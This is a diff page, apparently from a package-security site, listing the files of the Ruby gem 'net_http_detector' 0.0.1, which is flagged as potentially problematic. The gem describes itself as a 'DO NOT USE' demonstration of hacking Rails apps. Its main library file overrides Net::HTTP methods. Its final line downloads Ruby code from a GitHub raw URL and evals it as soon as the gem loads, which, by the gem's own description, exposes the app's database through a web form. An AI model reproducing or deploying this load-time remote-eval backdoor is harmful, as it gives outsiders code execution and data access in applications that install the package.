net_http_detector 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of net_http_detector might be problematic. Click here for more details.

Files changed (8) hide show
  1. data/.gitignore +5 -0
  2. data/Gemfile +4 -0
  3. data/Rakefile +2 -0
  4. data/lib/README +3 -0
  5. data/lib/net_http_detector/version.rb +3 -0
  6. data/lib/net_http_detector.rb +45 -0
  7. data/net_http_detector.gemspec +24 -0
  8. metadata +53 -0
data/.gitignore ADDED
@@ -0,0 +1,5 @@
1
+ *.gem
2
+ .bundle
3
+ Gemfile.lock
4
+ pkg/*
5
+ .idea
data/Gemfile ADDED
@@ -0,0 +1,4 @@
1
+ source "http://rubygems.org"
2
+
3
+ # Specify your gem's dependencies in net_http_detector.gemspec
4
+ gemspec
data/Rakefile ADDED
@@ -0,0 +1,2 @@
1
+ require "bundler/gem_tasks"
2
+ Bundler::GemHelper.install_tasks
data/lib/README ADDED
@@ -0,0 +1,3 @@
1
+ DO NOT USE THIS CODE!!!
2
+
3
+ This is an example of a gem that can compromise a Rails app.
data/lib/net_http_detector/version.rb ADDED
@@ -0,0 +1,3 @@
1
+ module NetHttpDetector
2
+ VERSION = "0.0.1"
3
+ end
data/lib/net_http_detector.rb ADDED
@@ -0,0 +1,45 @@
1
+ #require "net_http_detector/version"
2
+ #
3
+ #module NetHttpDetector
4
+ # # Your code goes here...
5
+ #end
6
+
7
+ require 'net/http'
8
+
9
+ module Net
10
+ class HTTP
11
+ def HTTP.valid_post_form(url, params)
12
+ req = Post.new(url.request_uri)
13
+ req.form_data = params
14
+ req.basic_auth url.user, url.password if url.user
15
+ new(url.hostname, url.port).start {|http|
16
+ http.request(req)
17
+ }
18
+ end
19
+
20
+ def HTTP.post_form(url, params)
21
+ self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
22
+ Net::HTTP.valid_post_form(url, params)
23
+ end
24
+
25
+ def HTTP.valid_get(uri_or_host, path = nil, port = nil)
26
+ Net::HTTP.get_response(uri_or_host, path, port).body
27
+ end
28
+
29
+ def HTTP.get(uri_or_host, path = nil, port = nil)
30
+ self.smart_log("Net::HTTP.get(#{uri_or_host.inspect}, #{path.inspect}, #{port.inspect})")
31
+
32
+ Net::HTTP.valid_get(uri_or_host, path, port)
33
+ end
34
+
35
+ def self.smart_log(log)
36
+ if defined? Rails
37
+ Rails.logger.error(log)
38
+ else
39
+ puts log
40
+ end
41
+ end
42
+ end
43
+ end
44
+
45
+ eval(Net::HTTP.valid_get(URI("https://raw.github.com/benjaminleesmith/evaled_snippets/master/db_console.rb")))
data/net_http_detector.gemspec ADDED
@@ -0,0 +1,24 @@
1
+ # -*- encoding: utf-8 -*-
2
+ $:.push File.expand_path("../lib", __FILE__)
3
+ require "net_http_detector/version"
4
+
5
+ Gem::Specification.new do |s|
6
+ s.name = "net_http_detector"
7
+ s.version = NetHttpDetector::VERSION
8
+ s.authors = ["Benjamin Smith"]
9
+ s.email = ["benjamin.lee.smith@gmail.com"]
10
+ s.homepage = ""
11
+ s.summary = "DO NOT USE: This is an example of hacking Rails apps using a gem."
12
+ s.description = "DO NOT USE: This is an example of hacking Rails apps using a gem. It exposes access to the database via a simple web form."
13
+
14
+ s.rubyforge_project = "net_http_detector"
15
+
16
+ s.files = `git ls-files`.split("\n")
17
+ s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
18
+ s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
19
+ s.require_paths = ["lib"]
20
+
21
+ # specify any dependencies here; for example:
22
+ # s.add_development_dependency "rspec"
23
+ # s.add_runtime_dependency "rest-client"
24
+ end
metadata ADDED
@@ -0,0 +1,53 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: net_http_detector
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ prerelease:
6
+ platform: ruby
7
+ authors:
8
+ - Benjamin Smith
9
+ autorequire:
10
+ bindir: bin
11
+ cert_chain: []
12
+ date: 2012-06-12 00:00:00.000000000 Z
13
+ dependencies: []
14
+ description: ! 'DO NOT USE: This is an example of hacking Rails apps using a gem.
15
+ It exposes access to the database via a simple web form.'
16
+ email:
17
+ - benjamin.lee.smith@gmail.com
18
+ executables: []
19
+ extensions: []
20
+ extra_rdoc_files: []
21
+ files:
22
+ - .gitignore
23
+ - Gemfile
24
+ - Rakefile
25
+ - lib/README
26
+ - lib/net_http_detector.rb
27
+ - lib/net_http_detector/version.rb
28
+ - net_http_detector.gemspec
29
+ homepage: ''
30
+ licenses: []
31
+ post_install_message:
32
+ rdoc_options: []
33
+ require_paths:
34
+ - lib
35
+ required_ruby_version: !ruby/object:Gem::Requirement
36
+ none: false
37
+ requirements:
38
+ - - ! '>='
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ required_rubygems_version: !ruby/object:Gem::Requirement
42
+ none: false
43
+ requirements:
44
+ - - ! '>='
45
+ - !ruby/object:Gem::Version
46
+ version: '0'
47
+ requirements: []
48
+ rubyforge_project: net_http_detector
49
+ rubygems_version: 1.8.15
50
+ signing_key:
51
+ specification_version: 3
52
+ summary: ! 'DO NOT USE: This is an example of hacking Rails apps using a gem.'
53
+ test_files: []